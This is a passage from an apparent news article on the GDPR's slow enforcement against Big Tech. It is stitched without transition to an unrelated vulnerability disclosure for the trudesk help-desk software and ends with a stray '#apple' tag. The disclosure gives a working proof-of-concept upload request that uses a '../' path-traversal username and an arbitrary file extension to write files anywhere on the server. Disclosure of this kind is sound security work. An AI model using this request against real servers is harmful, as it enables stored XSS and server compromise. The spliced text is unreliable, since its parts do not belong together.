But at Big Tech levels where data is plentiful, the scale of complying with GDPR is different. One recent internal Facebook document obtained by Motherboard hints that the company doesn't really know what it does with your data—an assertion Facebook denied at the time. Equally, a WIRED and _Reveal_ joint investigation at the end of 2021 found serious shortcomings in the ways Amazon handles customer data. (Amazon said it had an “exceptional” track record in protecting data.)

Microsoft declined a request to comment. Neither Google nor Facebook provided comment in time for publication.

“There is a lag, especially on Big Tech, enforcing the law on Big Tech—and Big Tech means cross-border cases, and that means the one-stop-shop and the cooperation among the data protection authorities,” says Ulrich Kelber, the head of the German federal data protection regulator. The one-stop-shop allows all of Europe’s regulators to have a say on the final decision of the lead regulator in that case, which can then be challenged. Ireland’s fine against WhatsApp grew from the original proposed penalty of as little as €30 million ($31.8 million) to €225 million ($238.5 million) after other regulators weighed in. Another Irish case against Instagram is currently being discussed, Dixon says, which will add months to its final outcome.

The one-stop-shop was created under GPDR, meaning the process has started with teething problems, but four years in, a lot still needs to be improved. Tobias Judin, the head of international at Norway’s data protection authority, says that each week several drafts of decisions are circulated among Europe’s data regulators. “In the vast majority of those cases, we actually agree,” Judin says. (German authorities object the most.) Decisions can face a lot of back and forth between regulators, wrapped up in bureaucracy. “We do question whether, in those cases that have a European-wide impact, it makes sense and whether it is feasible that these cases are solely dealt with by one data protection authority until we reach the decision stage,” Judin says.

Luxembourg’s data regulator hit Amazon with a record-breaking €746 million ($790.6 million) fine last year, its first case against the retailer. Amazon is contesting the fine in court—in a statement to WIRED, the company repeated its assertion that “there has been no data breach, and no customer data has been exposed to any third party”—but Luxembourg’s regulator says investigations will always be lengthy despite it bringing in new ways to investigate companies. “I think under one year or one-half year, I think it’s almost impossible to have it closed before such a delay,” says Alain Herrmann, one of Luxembourg’s four data protection commissioners. “There are huge \[amounts of\] information to deal with.” Herrmann says Luxembourg has a few other international cases ongoing, but national secrecy laws prevent it from talking about them. “It’s just the \[one-stop-shop\] system, the lack of resources, the lack of clear law and procedure, which makes their job even more difficult,” Robert says.

The French data regulator has, in some ways, sidestepped the international GDPR process by directly pursuing companies’ use of cookies. Despite common beliefs, annoying cookie pop-ups don’t come from GDPR—they’re governed by the EU’s separate E-Privacy law, and the French regulator has taken advantage of this. Marie-Laure Denis, the head of French regulator CNIL, has hit Google, Amazon, and Facebook with hefty fines for bad cookie practices. Perhaps more importantly, it has forced companies to change their behavior. Google is altering its cookie banners across the whole of Europe following the French enforcement.

“We are starting to see really concrete changes to the digital ecosystems and evolution of practices, which is really what we are looking \[for\],” Denis says. She explains that CNIL will next look at data collection by mobile apps under the E-Privacy law, and cloud data transfers under GDPR. The cookie enforcement effort wasn’t to avoid GDPR’s protracted process, but it was more efficient, Denis says. “We still believe in the GDPR enforcement mechanism, but we need to make it work better—and quicker.”

In the last year, there have been growing calls to change how GDPR works. “Enforcement should be more centralized for big affairs,” Viviane Redding, the politician who proposed GDPR back in 2012, said of the data law in May last year. The calls have come as Europe passed its next two big pieces of digital regulation: the Digital Services Act and the Digital Markets Act. The laws, which focus on competition and internet safety, handle enforcement differently from GDPR; in some instances, the European Commission will investigate Big Tech companies. The move is a nod to the fact that GDPR enforcement may not have been as smooth as politicians would have liked.

There appears to be little appetite to reopen GDPR itself; however, smaller tweaks could help improve enforcement. At a recent meeting of data regulators held by the European Data Protection Board, a body that exists to guide regulators, countries agreed that some international cases will work to fixed deadlines and timelines and said they would try to “join forces” on some investigations. Norway’s Judin says the move is positive but questions how effective it will be in practice.

Massé, from Access Now, says a small amendment to GDPR could significantly address some of the biggest current enforcement problems. Legislation could ensure data protection authorities handle complaints in the same way (including using the same forms), explicitly lay out how the one-stop-shop should work, and make sure that procedures in individual countries are the same, Massé says. In short, it could clarify how GDPR enforcement should be handled by every country.

The view is also shared by data regulators, at least to some degree. France’s Denis says regulators should share more information, more quickly on cross-border cases so they can build up an informal consensus around a potential decision. “The Commission could also, for example, look at resources given to data protection authorities,” Denis says. “Because it’s a member state’s obligation to give sufficient resources to data protection authorities to carry out their duties.” The staff and resources regulators have to investigate and enforce is dwarfed by those of Big Tech.

“Potentially, if there was the possibility for some kind of an instrument specific to the GDPR—being a legal instrument—that would specify certain process and procedural issues, that might assist,” Ireland’s Dixon says. She adds that complications that could be ironed out include issues around access to files during investigations, whether those making the complaints are given access to the investigation process, and problems in translations. “There’s a whole range of inconsistencies around that, giving rise to delays and dissatisfaction on all sides,” Dixon says.

Without some changes—and strong enforcement—civil society groups warn that GDPR could fail to stop the worst practices of Big Tech companies and improve people’s sense of privacy. “The immediate thing that needs to be addressed is the Big Tech firms,” Ryan says. “If we cannot deal with Big Tech, we will create a permanence to the fatalism that people feel about privacy and data.” Four years in, Massé says she still has hope for GDPR enforcement. “It's really not what we had hoped for. But it’s also not in a place that I think we can start digging a grave for the GDPR and forget about it.”

How GDPR Is Failing

Unrestricted Upload of File with Dangerous Type in GitHub repository polonel/trudesk prior to 1.2.2.

**Description**

The uploadImage function in accountsController take file path and extension from users . An attacker can change the path and extension to upload dangerous file to anywhere in server.

**Proof of Concept**

 1. Login 
 2. Upload profile image
 3. Capture request, modify `username` and `filename`
 

 POST /accounts/uploadImage HTTP/1.1
 Host: 192.168.20.132:8118
 Content-Length: 452
 Accept: application/json, text/plain, */*
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXoDBooqQ26crHR0
 Origin: http://192.168.20.132:8118
 Referer: http://192.168.20.132:8118/accounts
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: connect.sid=s%3A01nLIvLiz-oEhbSpekE9nwUSl9R_PQF1.GeCCIcToZnO%2BDlTis77aXBlVGyVOaQDURoUrIcrXQ%2BM; $trudesk%3Atimezone=America/New_York
 Connection: close
 
 ------WebKitFormBoundaryQXoDBooqQ26crHR0
 Content-Disposition: form-data; name="username"
 
 /../../../../../../testpathtravesal1
 ------WebKitFormBoundaryQXoDBooqQ26crHR0
 Content-Disposition: form-data; name="_id"
 
 627ce4cd7778b2c5b5f49851
 ------WebKitFormBoundaryQXoDBooqQ26crHR0
 Content-Disposition: form-data; name="image"; filename="filename.anything"
 Content-Type: image/jpeg
 
 <image content>
 ------WebKitFormBoundaryQXoDBooqQ26crHR0--
 
 

 

**Impact**

Authenticated user can upload dangerous file to anywhere in server (example: upload a file with .html extension lead to stored xss)

**Occurrences**

accounts.js L485-L505

This function take object.username into join.path() lead to path traversal, take path.extname(filename) lead to upload file with dangerous type

Tag

#apple